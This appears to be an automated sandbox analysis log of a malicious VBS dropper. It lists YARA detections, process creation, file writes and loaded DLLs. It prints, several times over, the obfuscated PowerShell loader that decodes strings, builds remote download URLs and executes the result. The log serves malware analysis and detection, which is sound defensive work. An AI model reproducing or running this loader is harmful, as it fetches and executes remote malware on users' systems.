Source: amsi32_6456.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6560, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6456, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.troj.expl.evad.winVBS@14/11@1/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Motorgadens.Alb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rt4on5nb.lj2.ps1
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Blikvarefabrikken.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6560
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6456
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Blikvarefabrikken.vbs | Virustotal: Detection: 8%
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Blikvarefabrikken.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2';$Xenon='Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe 
l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers ' Pro,th Vir etArvef tOverstpNabobisOrdina:benefi/ Objec/ Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A g
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2';$Xenon='Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers 
' Pro,th Vir etArvef tOverstpNabobisOrdina:benefi/ Objec/ Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A g
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2';$Xenon='Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe 
l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers ' Pro,th Vir etArvef tOverstpNabobisOrdina:benefi/ Objec/ Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A gJump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
